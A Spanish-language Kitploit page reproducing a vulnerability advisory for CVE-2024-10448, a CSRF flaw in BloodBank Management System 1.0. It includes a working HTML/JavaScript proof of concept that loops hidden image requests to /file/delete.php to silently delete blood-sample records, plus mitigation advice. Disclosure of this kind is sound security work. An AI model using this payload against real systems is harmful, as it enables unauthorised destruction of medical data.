Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10448 — POC de ataque CSRF en banco de sangre | Kitploit
Herramientas/GitHubGitHub/bevennyamande/cve-2024-10448
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

POC de ataque CSRF en banco de sangre

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Versión Afectada:

  • BloodBank Management System: 1.0

Información de la Vulnerabilidad:

  • Tipo de Vulnerabilidad: Cross Site Request Forgery (CSRF)
  • Severidad: ALTA
  • Estado: Sin Parchear

Endpoint Vulnerable:

  • Ruta: /file/delete.php?bid=

Descripción de la Vulnerabilidad:

Se descubrió una vulnerabilidad de Cross Site Request Forgery (CSRF) en la funcionalidad de solicitud de sangre del BloodBank Management System. Esta falla ocurre al enviar una solicitud delete a esta ruta /file/delete.php?bid=, lo que permite que el parámetro seleccione un registro para eliminar en la aplicación. Sin embargo, los son dinámicos dependiendo de la adición de las muestras de sangre, por lo que, para que la solicitud tenga éxito, utilicé una etiqueta de imagen generada con JavaScript dentro de un bucle.

Descargar herramienta
bid
bids

La explotación exitosa puede conllevar acciones no autorizadas, es decir, la eliminación de datos en nombre de la víctima. Además, esto podría explotarse al visitar sitios web maliciosos con el payload.


Prueba de Concepto (PoC):

A continuación se muestra un ejemplo de un Ataque PoC de CSRF que elimina las muestras de sangre disponibles mediante el parámetro bid. Aloja el archivo en un dominio controlado por el atacante; en mi caso, estaba usando localhost:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


Video POC

  • enlace de video

Impacto:

  • Manipulación de Datos: Los atacantes podrían modificar el contenido mostrado a los usuarios.
  • Daño Reputacional: Los usuarios podrían perder la confianza en el sistema debido al comportamiento malicioso.

Recomendaciones de Mitigación:

  1. Usar Token CSRF Implemente un mecanismo para disuadir el acceso entre dominios o añada csrf tokens en sus solicitudes y también evite que las solicitudes GET realicen acciones que cambien el estado.